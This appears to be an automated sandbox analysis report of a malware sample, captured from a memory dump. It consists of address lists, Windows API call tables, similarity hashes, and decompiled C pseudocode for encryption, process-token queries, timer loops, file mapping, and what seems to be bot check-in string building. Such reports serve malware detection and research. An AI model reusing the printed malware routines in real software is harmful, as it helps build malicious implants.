0x0477365c
0x0477365f
0x04773706
0x04773665
0x0477366b
0x0477366e
0x04773671
0x04773673
0x04773676
0x04773679
0x0477367b
0x0477367b
0x04773685
0x0477368a
0x0477368d
0x04773690
0x04773692
0x0477369b
0x047736c5
0x0477369d
0x047736ae
0x047736ae
0x047736cd
0x00000000
0x00000000
0x047736cf
0x047736d2
0x047736d5
0x047736d9
0x00000000
0x047736db
0x047736ea
0x047736f0
0x047736f8
0x047736f8
0x00000000
0x047736d9
0x047736dd
0x047736e5
0x047736e8
0x047736ff
0x00000000
0x00000000
0x00000000
0x047736e8
0x0477365f
0x04773718
0x0477371b
0x0477371b
0x04773730
0x04773730
0x04773748

APIs

CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000018,F0000000,00000000,00000000,00000000,?,?,?,04771B16,00000001,04776301,00000000), ref: 047735D9
memcpy.NTDLL(04771B16,04776301,00000010,?,?,?,04771B16,00000001,04776301,00000000,?,04775B47,00000000,04776301,?,00000000), ref: 047735F2
CryptImportKey.ADVAPI32(?,?,0000001C,00000000,00000000,00000000), ref: 0477361B
CryptSetKeyParam.ADVAPI32(00000000,00000001,?,00000000), ref: 04773633
memcpy.NTDLL(00000000,00000000,050E9630,00000010), ref: 04773685
CryptEncrypt.ADVAPI32(00000000,00000000,00000000,00000000,00000000,050E9630,00000020,?,?,00000010), ref: 047736AE
CryptDecrypt.ADVAPI32(00000000,00000000,00000000,00000000,00000000,050E9630,?,?,00000010), ref: 047736C5
GetLastError.KERNEL32(?,?,00000010), ref: 047736DD
GetLastError.KERNEL32 ref: 0477370F
CryptDestroyKey.ADVAPI32(00000000), ref: 0477371B
GetLastError.KERNEL32 ref: 04773723
CryptReleaseContext.ADVAPI32(?,00000000), ref: 04773730
GetLastError.KERNEL32(?,?,?,04771B16,00000001,04776301,00000000,?,04775B47,00000000,04776301,?,00000000,04776301,00000000,050E9630), ref: 04773738

Memory Dump Source

Source File: 00000003.00000002.917640583.0000000004771000.00000020.00000001.sdmp, Offset: 04770000, based on PE: true

Associated: 00000003.00000002.917632662.0000000004770000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.917651944.0000000004779000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.917659694.000000000477A000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.917667183.000000000477C000.00000002.00000001.sdmp Download File

Similarity

API ID: Crypt$ErrorLast$Contextmemcpy$AcquireDecryptDestroyEncryptImportParamRelease
String ID:
API String ID: 1967744295-0
Opcode ID: f5bc625d2797a30de6d09d3ef488859b42edd3c0b7510db0d7cc020bce98699e
Instruction ID: 03140a2018a4d433834acb9c740e3b7823e449b3ef79d0d43a3026aca8aa5f28
Opcode Fuzzy Hash: f5bc625d2797a30de6d09d3ef488859b42edd3c0b7510db0d7cc020bce98699e
Instruction Fuzzy Hash: 475141B1900209FFEF10DFA5DD84AEE7BB9EB44340F508829F915E6250E735AE14DB61

Uniqueness

Uniqueness Score: -1.00%

Function 04773CA1, Relevance: 10.6, APIs: 7, Instructions: 81
nativeCOMMON

Download Yara Rule

C-Code - Quality: 38%

			E04773CA1(char _a4, void* _a8) {
				void* _v8;
				void* _v12;
				char _v16;
				void* _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				void* _v44;
				void** _t33;
				void* _t40;
				void* _t43;
				void** _t44;
				intOrPtr* _t47;
				char _t48;

				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v20 = _a4;
				_t48 = 0;
				_v16 = 0;
				_a4 = 0;
				_v44 = 0x18;
				_v40 = 0;
				_v32 = 0;
				_v36 = 0;
				_v28 = 0;
				_v24 = 0;
				if(NtOpenProcess( &_v12, 0x400,  &_v44,  &_v20) >= 0) {
					_t33 =  &_v8;
					__imp__(_v12, 8, _t33);
					if(_t33 >= 0) {
						_t47 = __imp__;
						 *_t47(_v8, 1, 0, 0,  &_a4, _t43); // executed
						_t44 = E04775C4E(_a4);
						if(_t44 != 0) {
							_t40 =  *_t47(_v8, 1, _t44, _a4,  &_a4); // executed
							if(_t40 >= 0) {
								memcpy(_a8,  *_t44, 0x1c);
								_t48 = 1;
							}
							E04772A03(_t44);
						}
						NtClose(_v8); // executed
					}
					NtClose(_v12);
				}
				return _t48;
			}

0x04773cae
0x04773caf
0x04773cb0
0x04773cb1
0x04773cb2
0x04773cb6
0x04773cbd
0x04773ccc
0x04773ccf
0x04773cd2
0x04773cd9
0x04773cdc
0x04773cdf
0x04773ce2
0x04773ce5
0x04773cf0
0x04773cf2
0x04773cfb
0x04773d03
0x04773d05
0x04773d17
0x04773d21
0x04773d25
0x04773d34
0x04773d38
0x04773d41
0x04773d49
0x04773d49
0x04773d4b
0x04773d4b
0x04773d53
0x04773d59
0x04773d5d
0x04773d5d
0x04773d68

APIs

NtOpenProcess.NTDLL(00000000,00000400,?,?), ref: 04773CE8
NtOpenProcessToken.NTDLL(00000000,00000008,00000000), ref: 04773CFB
NtQueryInformationToken.NTDLL(00000000,00000001,00000000,00000000,00000000), ref: 04773D17

Part of subcall function 04775C4E: RtlAllocateHeap.NTDLL(00000000,00000000,04773FAA), ref: 04775C5A

NtQueryInformationToken.NTDLL(00000000,00000001,00000000,00000000,00000000), ref: 04773D34
memcpy.NTDLL(00000000,00000000,0000001C), ref: 04773D41
NtClose.NTDLL(00000000), ref: 04773D53
NtClose.NTDLL(00000000), ref: 04773D5D

Memory Dump Source

Source File: 00000003.00000002.917640583.0000000004771000.00000020.00000001.sdmp, Offset: 04770000, based on PE: true

Associated: 00000003.00000002.917632662.0000000004770000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.917651944.0000000004779000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.917659694.000000000477A000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.917667183.000000000477C000.00000002.00000001.sdmp Download File

Similarity

API ID: Token$CloseInformationOpenProcessQuery$AllocateHeapmemcpy
String ID:
API String ID: 2575439697-0
Opcode ID: 904728498db9bbce25a823192f6c23fb88c6ea36e3377f3109e50ede9110dec2
Instruction ID: 51daa7090b6ea8365169a56ec6eb9ed48c73bfa04c3385f7ebee7006c1a8c148
Opcode Fuzzy Hash: 904728498db9bbce25a823192f6c23fb88c6ea36e3377f3109e50ede9110dec2
Instruction Fuzzy Hash: 2021E9B1900118BBEF119F95CC499DEBFBDFF08740F508066FA05E6260E7719A54DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 04776DB7, Relevance: 33.3, APIs: 22, Instructions: 263
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 77%

			E04776DB7(long __eax, void* __ecx, void* __edx, intOrPtr _a4, void* _a8, char** _a12, int* _a16, signed int _a20) {
				void* _v8;
				void* _v12;
				void* _v16;
				void* _v20;
				void* __ebx;
				void* __edi;
				long _t63;
				intOrPtr _t64;
				intOrPtr _t65;
				intOrPtr _t66;
				intOrPtr _t67;
				intOrPtr _t68;
				void* _t71;
				intOrPtr _t72;
				int _t75;
				void* _t76;
				intOrPtr _t77;
				intOrPtr _t81;
				intOrPtr _t85;
				intOrPtr _t86;
				void* _t88;
				void* _t91;
				intOrPtr _t95;
				intOrPtr _t99;
				intOrPtr* _t101;
				void* _t102;
				void* _t107;
				intOrPtr _t112;
				signed int _t116;
				char** _t118;
				int _t121;
				signed int _t123;
				intOrPtr* _t124;
				intOrPtr* _t126;
				intOrPtr* _t128;
				intOrPtr* _t130;
				intOrPtr _t133;
				intOrPtr _t136;
				int _t139;
				intOrPtr _t140;
				int _t143;
				void* _t144;
				void* _t145;
				void* _t155;
				int _t158;
				void* _t159;
				void* _t160;
				void* _t161;
				intOrPtr _t162;
				void* _t164;
				long _t168;
				intOrPtr* _t169;
				intOrPtr* _t172;
				void* _t173;
				void* _t175;
				void* _t176;
				void* _t181;

				_t155 = __edx;
				_t145 = __ecx;
				_t63 = __eax;
				_t144 = _a20;
				_a20 = 8;
				if(__eax == 0) {
					_t63 = GetTickCount();
				}
				_t64 =  *0x477a018; // 0x5ffc1f8b
				asm("bswap eax");
				_t65 =  *0x477a014; // 0x5cb11ae7
				asm("bswap eax");
				_t66 =  *0x477a010; // 0x15dc9586
				asm("bswap eax");
				_t67 =  *0x477a00c; // 0x67522d90
				asm("bswap eax");
				_t68 =  *0x477a2d0; // 0x96d5a8
				_t3 = _t68 + 0x477b622; // 0x74666f73
				_t158 = wsprintfA(_t144, _t3, 3, 0x3d14c, _t67, _t66, _t65, _t64,  *0x477a02c,  *0x477a004, _t63);
				_t71 = E0477271A();
				_t72 =  *0x477a2d0; // 0x96d5a8
				_t4 = _t72 + 0x477b662; // 0x74707526
				_t75 = wsprintfA(_t158 + _t144, _t4, _t71);
				_t175 = _t173 + 0x38;
				_t159 = _t158 + _t75;
				if(_a8 != 0) {
					_t140 =  *0x477a2d0; // 0x96d5a8
					_t8 = _t140 + 0x477b66d; // 0x732526
					_t143 = wsprintfA(_t159 + _t144, _t8, _a8);
					_t175 = _t175 + 0xc;
					_t159 = _t159 + _t143;
				}
				_t76 = E04772956(_t145);
				_t77 =  *0x477a2d0; // 0x96d5a8
				_t10 = _t77 + 0x477b38a; // 0x6d697426
				_t160 = _t159 + wsprintfA(_t159 + _t144, _t10, _t76, _t155);
				_t81 =  *0x477a2d0; // 0x96d5a8
				_t12 = _t81 + 0x477b7b4; // 0x50e8d5c
				_t181 = _a4 - _t12;
				_t14 = _t81 + 0x477b33b; // 0x74636126
				_t157 = 0 | _t181 == 0x00000000;
				_t161 = _t160 + wsprintfA(_t160 + _t144, _t14, _t181 == 0);
				_t85 =  *0x477a318; // 0x50e95e0
				_t176 = _t175 + 0x1c;
				if(_t85 != 0) {
					_t136 =  *0x477a2d0; // 0x96d5a8
					_t18 = _t136 + 0x477b8ea; // 0x3d736f26
					_t139 = wsprintfA(_t161 + _t144, _t18, _t85);
					_t176 = _t176 + 0xc;
					_t161 = _t161 + _t139;
				}
				_t86 =  *0x477a328; // 0x50e95b0
				if(_t86 != 0) {
					_t133 =  *0x477a2d0; // 0x96d5a8
					_t20 = _t133 + 0x477b685; // 0x73797326
					wsprintfA(_t161 + _t144, _t20, _t86);
					_t176 = _t176 + 0xc;
				}
				_t162 =  *0x477a37c; // 0x50e9630
				_t88 = E04775741(0x477a00a, _t162 + 4);
				_t168 = 0;
				_v12 = _t88;
				if(_t88 == 0) {
					L28:
					RtlFreeHeap( *0x477a290, _t168, _t144); // executed
					return _a20;
				} else {
					_t91 = RtlAllocateHeap( *0x477a290, 0, 0x800);
					_a8 = _t91;
					if(_t91 == 0) {
						L27:
						HeapFree( *0x477a290, _t168, _v12);
						goto L28;
					}
					E04771A51(GetTickCount());
					_t95 =  *0x477a37c; // 0x50e9630
					__imp__(_t95 + 0x40);
					asm("lock xadd [eax], ecx");
					_t99 =  *0x477a37c; // 0x50e9630
					__imp__(_t99 + 0x40);
					_t101 =  *0x477a37c; // 0x50e9630
					_t102 = E04775AE3(1, _t157, _t144,  *_t101); // executed
					_t164 = _t102;
					_v20 = _t164;
					asm("lock xadd [eax], ecx");
					if(_t164 == 0) {
						L26:
						HeapFree( *0x477a290, _t168, _a8);
						goto L27;
					}
					StrTrimA(_t164, 0x47792cc);
					_push(_t164);
					_t107 = E04772829();
					_v8 = _t107;
					if(_t107 == 0) {
						L25:
						HeapFree( *0x477a290, _t168, _t164);
						goto L26;
					}
					 *_t164 = 0;
					__imp__(_a8, _v12);
					_t169 = __imp__;
					 *_t169(_a8, _v8);
					 *_t169(_a8, _t164);
					_t112 = E047733FA(0, _a8);
					_a4 = _t112;
					if(_t112 == 0) {
						_a20 = 8;
						L23:
						E04772813();
						L24:
						HeapFree( *0x477a290, 0, _v8);
						_t168 = 0;
						goto L25;
					}
					_t116 = E04775C63(_t144, 0xffffffffffffffff, _t164,  &_v16); // executed
					_a20 = _t116;
					if(_t116 == 0) {
						_t172 = _v16;
						_t123 = E04771671(_t172, _a4, _a12, _a16); // executed
						_a20 = _t123;
						_t124 =  *((intOrPtr*)(_t172 + 8));
						 *((intOrPtr*)( *_t124 + 0x80))(_t124);
						_t126 =  *((intOrPtr*)(_t172 + 8));
						 *((intOrPtr*)( *_t126 + 8))(_t126);
						_t128 =  *((intOrPtr*)(_t172 + 4));
						 *((intOrPtr*)( *_t128 + 8))(_t128);
						_t130 =  *_t172;
						 *((intOrPtr*)( *_t130 + 8))(_t130);
						E04772A03(_t172);
					}
					if(_a20 != 0x10d2) {
						L18:
						if(_a20 == 0) {
							_t118 = _a12;
							if(_t118 != 0) {
								_t165 =  *_t118;
								_t170 =  *_a16;
								wcstombs( *_t118,  *_t118,  *_a16);
								_t121 = E04776459(_t165, _t165, _t170 >> 1);
								_t164 = _v20;
								 *_a16 = _t121;
							}
						}
						goto L21;
					} else {
						if(_a12 != 0) {
							L21:
							E04772A03(_a4);
							if(_a20 == 0 || _a20 == 0x10d2) {
								goto L24;
							} else {
								goto L23;
							}
						}
						_a20 = _a20 & 0x00000000;
						goto L18;
					}
				}
			}

0x04776db7
0x04776db7
0x04776db7
0x04776dc0
0x04776dc5
0x04776dcc
0x04776dce
0x04776dce
0x04776ddb
0x04776de6
0x04776de9
0x04776df4
0x04776df7
0x04776dfc
0x04776dff
0x04776e04
0x04776e07
0x04776e13
0x04776e20
0x04776e22
0x04776e28
0x04776e2d
0x04776e38
0x04776e3a
0x04776e3d
0x04776e43
0x04776e45
0x04776e4d
0x04776e58
0x04776e5a
0x04776e5d
0x04776e5d
0x04776e5f
0x04776e66
0x04776e6b
0x04776e78
0x04776e7a
0x04776e7f
0x04776e87
0x04776e8a
0x04776e90
0x04776e9b
0x04776e9d
0x04776ea2
0x04776ea7
0x04776eaa
0x04776eaf
0x04776eba
0x04776ebc
0x04776ebf
0x04776ebf
0x04776ec1
0x04776ec8
0x04776ecb
0x04776ed0
0x04776eda
0x04776edc
0x04776edc
0x04776edf
0x04776eed
0x04776ef2
0x04776ef6
0x04776ef9
0x047770c5
0x047770cd
0x047770da
0x04776eff
0x04776f0b
0x04776f13
0x04776f16
0x047770b5
0x047770bf
0x00000000
0x047770bf
0x04776f22
0x04776f27
0x04776f30
0x04776f41
0x04776f45
0x04776f4e
0x04776f54
0x04776f5c
0x04776f61
0x04776f68
0x04776f71
0x04776f77
0x047770a5
0x047770af
0x00000000
0x047770af
0x04776f83
0x04776f89
0x04776f8a
0x04776f91
0x04776f94
0x04777097
0x0477709f
0x00000000
0x0477709f
0x04776f9d
0x04776fa3
0x04776fac
0x04776fb5
0x04776fbb
0x04776fc2
0x04776fc9
0x04776fcc
0x047770dd
0x0477707f
0x0477707f
0x04777084
0x0477708f
0x04777095
0x00000000
0x04777095
0x04776fd6
0x04776fdd
0x04776fe0
0x04776fe5
0x04776ff0
0x04776ff5
0x04776ff8
0x04776ffe
0x04777004
0x0477700a
0x0477700d
0x04777013
0x04777016
0x0477701b
0x0477701f
0x0477701f
0x0477702b
0x04777037
0x0477703b
0x0477703d
0x04777042
0x04777044
0x04777049
0x0477704e
0x0477705b
0x04777063
0x04777066
0x04777066
0x04777042
0x00000000
0x0477702d
0x04777031
0x04777068
0x0477706b
0x04777074
0x00000000
0x00000000
0x00000000
0x00000000
0x04777074
0x04777033
0x00000000
0x04777033
0x0477702b

APIs

GetTickCount.KERNEL32 ref: 04776DCE
wsprintfA.USER32 ref: 04776E1B
wsprintfA.USER32 ref: 04776E38
wsprintfA.USER32 ref: 04776E58
wsprintfA.USER32 ref: 04776E76
wsprintfA.USER32 ref: 04776E99
wsprintfA.USER32 ref: 04776EBA
wsprintfA.USER32 ref: 04776EDA
RtlAllocateHeap.NTDLL(00000000,00000800), ref: 04776F0B
GetTickCount.KERNEL32 ref: 04776F1C
RtlEnterCriticalSection.NTDLL(050E95F0), ref: 04776F30
RtlLeaveCriticalSection.NTDLL(050E95F0), ref: 04776F4E

Part of subcall function 04775AE3: lstrlen.KERNEL32(00000000,00000000,253D7325,00000000,00000000,?,00000000,04776301,00000000,050E9630), ref: 04775B0E
Part of subcall function 04775AE3: lstrlen.KERNEL32(00000000,?,00000000,04776301,00000000,050E9630), ref: 04775B16
Part of subcall function 04775AE3: strcpy.NTDLL ref: 04775B2D
Part of subcall function 04775AE3: lstrcat.KERNEL32(00000000,00000000), ref: 04775B38
Part of subcall function 04775AE3: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,04776301,?,00000000,04776301,00000000,050E9630), ref: 04775B55

StrTrimA.SHLWAPI(00000000,047792CC,?,050E9630), ref: 04776F83

Part of subcall function 04772829: lstrlen.KERNEL32(050E887A,00000000,00000000,00000000,04776328,00000000), ref: 04772839
Part of subcall function 04772829: lstrlen.KERNEL32(?), ref: 04772841
Part of subcall function 04772829: lstrcpy.KERNEL32(00000000,050E887A), ref: 04772855
Part of subcall function 04772829: lstrcat.KERNEL32(00000000,?), ref: 04772860

lstrcpy.KERNEL32(00000000,?), ref: 04776FA3
lstrcat.KERNEL32(00000000,?), ref: 04776FB5
lstrcat.KERNEL32(00000000,00000000), ref: 04776FBB

Part of subcall function 047733FA: lstrlen.KERNEL32(?,0477A380,73BB7FC0,00000000,04772788,?,?,?,?,?,04773EAC,?), ref: 04773403
Part of subcall function 047733FA: mbstowcs.NTDLL ref: 0477342A
Part of subcall function 047733FA: memset.NTDLL ref: 0477343C

wcstombs.NTDLL ref: 0477704E

Part of subcall function 04771671: SysAllocString.OLEAUT32(00000000), ref: 047716B2
Part of subcall function 04771671: IUnknown_QueryInterface_Proxy.RPCRT4(00000008,332C4425,00000000), ref: 04771734
Part of subcall function 04771671: StrStrIW.SHLWAPI(00000000,006E0069), ref: 04771773

Part of subcall function 04772A03: RtlFreeHeap.NTDLL(00000000,00000000,04774072,00000000,?,?,00000000,?,?,?,?,?,?,047744AE,00000000), ref: 04772A0F

HeapFree.KERNEL32(00000000,?,00000000), ref: 0477708F
HeapFree.KERNEL32(00000000,00000000,00000000), ref: 0477709F
HeapFree.KERNEL32(00000000,00000000,?,050E9630), ref: 047770AF
HeapFree.KERNEL32(00000000,?), ref: 047770BF
RtlFreeHeap.NTDLL(00000000,?), ref: 047770CD

Memory Dump Source

Source File: 00000003.00000002.917640583.0000000004771000.00000020.00000001.sdmp, Offset: 04770000, based on PE: true

Associated: 00000003.00000002.917632662.0000000004770000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.917651944.0000000004779000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.917659694.000000000477A000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.917667183.000000000477C000.00000002.00000001.sdmp Download File

Similarity

API ID: Heapwsprintf$Free$lstrlen$lstrcat$CountCriticalSectionTickTrimlstrcpy$AllocAllocateEnterInterface_LeaveProxyQueryStringUnknown_mbstowcsmemsetstrcpywcstombs
String ID:
API String ID: 2871901346-0
Opcode ID: b3a745d8dbf5bf6e3b29362836e01944274ea15405ee8ec02551055401676872
Instruction ID: 031ebc822792b74ea655e3726bbb01aa515ec0ca05a10f61fc4ba8d327d00ae2
Opcode Fuzzy Hash: b3a745d8dbf5bf6e3b29362836e01944274ea15405ee8ec02551055401676872
Instruction Fuzzy Hash: 81A14CB1500109AFEF11DFA8DC88EDA3BA9FB48354B948825F909D7250D739ED50CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 04771B47, Relevance: 16.6, APIs: 11, Instructions: 149
timememoryCOMMON

Download Yara Rule

C-Code - Quality: 83%

			E04771B47(intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				struct %anon52 _v8;
				long _v12;
				char _v16;
				char _v20;
				signed int _v24;
				intOrPtr _v32;
				union _LARGE_INTEGER _v36;
				intOrPtr _v40;
				void* _v44;
				void _v88;
				char _v92;
				struct %anon52 _t46;
				intOrPtr _t51;
				long _t53;
				void* _t54;
				struct %anon52 _t61;
				long _t65;
				signed int _t66;
				void* _t69;
				void* _t71;
				signed int _t72;
				intOrPtr _t74;
				intOrPtr _t76;
				void** _t78;
				void* _t80;

				_t74 = __edx;
				_v92 = 0;
				memset( &_v88, 0, 0x2c);
				_t46 = CreateWaitableTimerA(0, 1, 0);
				_v44 = _t46;
				if(_t46 == 0) {
					_v8.LowPart = GetLastError();
				} else {
					_push(0xffffffff);
					_push(0xff676980);
					_push(0);
					_push( *0x477a298);
					_v20 = 0;
					_v16 = 0;
					L04777F56();
					_v36.LowPart = _t46;
					_v32 = _t74;
					SetWaitableTimer(_v44,  &_v36, 0, 0, 0, 0);
					_t51 =  *0x477a2c4; // 0x2e8
					_v40 = _t51;
					_t53 = WaitForMultipleObjects(2,  &_v44, 0, 0xffffffff);
					_v8.LowPart = _t53;
					if(_t53 == 0) {
						if(_a8 != 0) {
							L4:
							 *0x477a2a4 = 5;
						} else {
							_t69 = E04774A3C(_t74); // executed
							if(_t69 != 0) {
								goto L4;
							}
						}
						_v12 = 0;
						L6:
						L6:
						if(_v12 == 1 && ( *0x477a2b8 & 0x00000001) == 0) {
							_v12 = 2;
						}
						_t72 = _v12;
						_t58 = _t72 << 4;
						_t76 = _t80 + (_t72 << 4) - 0x54;
						_t73 = _t72 + 1;
						_v24 = _t72 + 1;
						_t61 = E0477243C( &_v20, _t73, _t73, _t80 + _t58 - 0x58, _t76,  &_v16); // executed
						_v8.LowPart = _t61;
						if(_t61 != 0) {
							goto L17;
						}
						_t66 = _v24;
						_t90 = _t66 - 3;
						_v12 = _t66;
						if(_t66 != 3) {
							goto L6;
						} else {
							_v8.LowPart = E04777289(_t73, _t90,  &_v92, _a4, _a8);
						}
						goto L12;
						L17:
						__eflags = _t61 - 0x10d2;
						if(_t61 != 0x10d2) {
							_push(0xffffffff);
							_push(0xff676980);
							_push(0);
							_push( *0x477a29c);
							goto L21;
						} else {
							__eflags =  *0x477a2a0; // 0xa
							if(__eflags == 0) {
								goto L12;
							} else {
								_t61 = E04772813();
								_push(0xffffffff);
								_push(0xdc3cba00);
								_push(0);
								_push( *0x477a2a0);
								L21:
								L04777F56();
								_v36.LowPart = _t61;
								_v32 = _t76;
								SetWaitableTimer(_v44,  &_v36, 0, 0, 0, 0); // executed
								_t65 = WaitForMultipleObjects(2,  &_v44, 0, 0xffffffff);
								__eflags = _t65;
								_v8.LowPart = _t65;
								if(_t65 == 0) {
									goto L6;
								} else {
									goto L12;
								}
							}
						}
						L25:
					}
					L12:
					_t78 =  &_v92;
					_t71 = 3;
					do {
						_t54 =  *_t78;
						if(_t54 != 0) {
							HeapFree( *0x477a290, 0, _t54);
						}
						_t78 =  &(_t78[4]);
						_t71 = _t71 - 1;
					} while (_t71 != 0);
					CloseHandle(_v44);
				}
				return _v8;
				goto L25;
			}

0x04771b47
0x04771b59
0x04771b5c
0x04771b68
0x04771b70
0x04771b73
0x04771cd9
0x04771b79
0x04771b79
0x04771b7b
0x04771b80
0x04771b81
0x04771b87
0x04771b8a
0x04771b8d
0x04771b9b
0x04771ba6
0x04771ba9
0x04771bab
0x04771bb8
0x04771bc2
0x04771bc6
0x04771bc9
0x04771bce
0x04771bd9
0x04771bd9
0x04771bd0
0x04771bd0
0x04771bd7
0x00000000
0x00000000
0x04771bd7
0x04771be3
0x00000000
0x04771be6
0x04771bea
0x04771bf5
0x04771bf5
0x04771bfc
0x04771c01
0x04771c08
0x04771c11
0x04771c17
0x04771c1a
0x04771c21
0x04771c24
0x00000000
0x00000000
0x04771c26
0x04771c29
0x04771c2c
0x04771c2f
0x00000000
0x04771c31
0x04771c40
0x04771c40
0x00000000
0x04771c6e
0x04771c6e
0x04771c73
0x04771c92
0x04771c94
0x04771c99
0x04771c9a
0x00000000
0x04771c75
0x04771c75
0x04771c7b
0x00000000
0x04771c7d
0x04771c7d
0x04771c82
0x04771c84
0x04771c89
0x04771c8a
0x04771ca0
0x04771ca0
0x04771ca8
0x04771cb3
0x04771cb6
0x04771cc1
0x04771cc3
0x04771cc5
0x04771cc8
0x00000000
0x04771cce
0x00000000
0x04771cce
0x04771cc8
0x04771c7b
0x00000000
0x04771c73
0x04771c43
0x04771c45
0x04771c48
0x04771c49
0x04771c49
0x04771c4d
0x04771c57
0x04771c57
0x04771c5d
0x04771c60
0x04771c60
0x04771c66
0x04771c66
0x04771ce3
0x00000000

APIs

memset.NTDLL ref: 04771B5C
CreateWaitableTimerA.KERNEL32(00000000,00000001,00000000), ref: 04771B68
_allmul.NTDLL(00000000,FF676980,000000FF), ref: 04771B8D
SetWaitableTimer.KERNELBASE(?,?,00000000,00000000,00000000,00000000), ref: 04771BA9
WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 04771BC2
HeapFree.KERNEL32(00000000,00000000), ref: 04771C57
CloseHandle.KERNEL32(?), ref: 04771C66
_allmul.NTDLL(00000000,FF676980,000000FF,00000002), ref: 04771CA0
SetWaitableTimer.KERNELBASE(?,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF,00000002,?,?,04772F7D), ref: 04771CB6
WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 04771CC1

Part of subcall function 04774A3C: StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,050E9338,00000000,?,73BCF710,00000000,73BCF730), ref: 04774A8B
Part of subcall function 04774A3C: HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,050E9370,?,00000000,30314549,00000014,004F0053,050E932C), ref: 04774B28
Part of subcall function 04774A3C: HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,04771BD5), ref: 04774B3A

GetLastError.KERNEL32 ref: 04771CD3

Memory Dump Source

Source File: 00000003.00000002.917640583.0000000004771000.00000020.00000001.sdmp, Offset: 04770000, based on PE: true

Associated: 00000003.00000002.917632662.0000000004770000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.917651944.0000000004779000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.917659694.000000000477A000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.917667183.000000000477C000.00000002.00000001.sdmp Download File

Similarity

API ID: FreeHeapTimerWaitable$MultipleObjectsWait_allmul$CloseCreateErrorHandleLastmemset
String ID:
API String ID: 3521023985-0
Opcode ID: fb2c9934f39e3bd8ebbec60ef234e45f543ca27d1123dd0e122706c95e869e07
Instruction ID: 3500a22b853e4af48e057d234d737c7a0dd5b269479ea2e0c96ac3479713ea7a
Opcode Fuzzy Hash: fb2c9934f39e3bd8ebbec60ef234e45f543ca27d1123dd0e122706c95e869e07
Instruction Fuzzy Hash: 6D519CB0905229AEEF109FD4DD44DEEBFB8EF48360F908116E910E2390D735AA44CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 047757AD, Relevance: 13.6, APIs: 9, Instructions: 72
filetimeCOMMON

Download Yara Rule

C-Code - Quality: 74%

			E047757AD(intOrPtr __edx, void** _a4, void** _a8) {
				intOrPtr _v8;
				struct _FILETIME* _v12;
				short _v56;
				struct _FILETIME* _t12;
				intOrPtr _t13;
				void* _t17;
				void* _t21;
				intOrPtr _t27;
				long _t28;
				void* _t30;

				_t27 = __edx;
				_t12 =  &_v12;
				GetSystemTimeAsFileTime(_t12);
				_push(0x192);
				_push(0x54d38000);
				_push(_v8);
				_push(_v12);
				L04777F50();
				_push(_t12);
				_v12 = _t12;
				_t13 =  *0x477a2d0; // 0x96d5a8
				_t5 = _t13 + 0x477b84d; // 0x50e8df5
				_t6 = _t13 + 0x477b580; // 0x530025
				_push(0x16);
				_push( &_v56);
				_v8 = _t27;
				L04777C2A();
				_t17 = CreateFileMappingW(0xffffffff, 0x477a2d4, 4, 0, 0x1000,  &_v56); // executed
				_t30 = _t17;
				if(_t30 == 0) {
					_t28 = GetLastError();
				} else {
					if(GetLastError() == 0xb7) {
						_t21 = MapViewOfFile(_t30, 6, 0, 0, 0); // executed
						if(_t21 == 0) {
							_t28 = GetLastError();
							if(_t28 != 0) {
								goto L6;
							}
						} else {
							 *_a4 = _t30;
							 *_a8 = _t21;
							_t28 = 0;
						}
					} else {
						_t28 = 2;
						L6:
						CloseHandle(_t30);
					}
				}
				return _t28;
			}

0x047757ad
0x047757b5
0x047757b9
0x047757bf
0x047757c4
0x047757c9
0x047757cc
0x047757cf
0x047757d4
0x047757d5
0x047757d8
0x047757dd
0x047757e4
0x047757ee
0x047757f0
0x047757f1
0x047757f4
0x04775810
0x04775816
0x0477581a
0x04775868
0x0477581c
0x04775829
0x04775839
0x04775841
0x04775853
0x04775857
0x00000000
0x00000000
0x04775843
0x04775846
0x0477584b
0x0477584d
0x0477584d
0x0477582b
0x0477582d
0x04775859
0x0477585a
0x0477585a
0x04775829
0x0477586f

APIs

GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,04772DF9,?,00000001,?), ref: 047757B9
_aulldiv.NTDLL(?,?,54D38000,00000192), ref: 047757CF
_snwprintf.NTDLL ref: 047757F4
CreateFileMappingW.KERNELBASE(000000FF,0477A2D4,00000004,00000000,00001000,?), ref: 04775810
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,04772DF9,?), ref: 04775822
MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000), ref: 04775839
CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,04772DF9), ref: 0477585A
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,04772DF9,?), ref: 04775862

Memory Dump Source

Source File: 00000003.00000002.917640583.0000000004771000.00000020.00000001.sdmp, Offset: 04770000, based on PE: true

Associated: 00000003.00000002.917632662.0000000004770000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.917651944.0000000004779000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.917659694.000000000477A000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.917667183.000000000477C000.00000002.00000001.sdmp Download File

